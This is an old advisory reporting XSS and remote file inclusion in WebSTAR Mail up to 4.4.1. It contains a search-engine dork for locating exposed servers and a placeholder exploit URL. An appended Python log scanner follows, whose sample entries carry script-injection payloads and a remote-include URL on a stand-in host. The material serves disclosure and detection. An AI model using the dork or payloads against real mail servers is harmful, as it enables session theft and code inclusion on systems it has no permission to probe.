WebSTAR Mail versions 4.4.1 and below suffer from cross site scripting and remote file inclusion vulnerabilities.
Hi PacketStormSecurity!
I'm reporting a vulnerability of type XSS and RFI in WebSTAR Mail. Thank you for
all.
+==========================================================================+
+ WebSTAR Mail <= 4.4.1 XSS & RFI Multiple Remote Vulnerabilities +
+==========================================================================+
Author(s): Ivan Sanchez & Maximiliano Soler
Product: Kerio.
Web: http://www.kerio.com/webstar_home.html
Versions: 4.4.1 (or less).
Date: 21/01/2008
GOOGLE DORKS:
------------
[+] intitle:"WebSTAR Mail - Please Log In" inurl:".mail"
EXPLOIT:
--------
For example, after the "@" variable:
http://www.[DOMAIN].tld/.mail?[ERROR-Code]@[XSS or RFI]
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar
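
For defenders, the request shape in the EXPLOIT section above can be hunted for in web server logs. The following is an added example, not part of the original advisory or of WebSTAR: it assumes a combined-format access log, and the sample lines, the "E1" error-code placeholder and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup or script-like content after the "@" suggests reflected XSS probing.
MARKUP = re.compile(r'[<>"\']|javascript:|on\w+\s*=', re.I)
# An absolute or scheme-relative URL after the "@" suggests an inclusion attempt.
REMOTE = re.compile(r'(?:https?|ftp)://|^//', re.I)

def classify(line):
    """Return (label, decoded_tail) for a suspicious .mail? request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, sep, query = m.group(1).partition("?")
    if not sep or not path.lower().endswith(".mail") or "@" not in query:
        return None
    # Decode twice so double-encoded input (%253C) is still seen as "<".
    tail = unquote(unquote(query.partition("@")[2]))
    if MARKUP.search(tail):
        return ("xss", tail)
    if REMOTE.search(tail):
        return ("remote-include", tail)
    return None

def scan(lines):
    """Return (line_number, label, decoded_tail) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, *verdict))
    return hits

# Constructed sample entries (documentation addresses, placeholder error code "E1").
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2008:10:00:01 +0000] "GET /.mail HTTP/1.1" 200 5120',
    '192.0.2.11 - - [21/Jan/2008:10:00:07 +0000] "GET /.mail?E1@%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 911',
    '192.0.2.12 - - [21/Jan/2008:10:00:09 +0000] "GET /.mail?E1@http://example.invalid/inc.txt HTTP/1.1" 200 902',
    '192.0.2.13 - - [21/Jan/2008:10:00:12 +0000] "GET /.mail?E1@%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 915',
    '192.0.2.14 - - [21/Jan/2008:10:00:15 +0000] "GET /index.html?u=a@b.example HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, label, tail in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {tail!r}")
```

Flagged entries show only that the pattern was requested; whether the server reflected or fetched the value has to be confirmed from the response or from outbound connection logs.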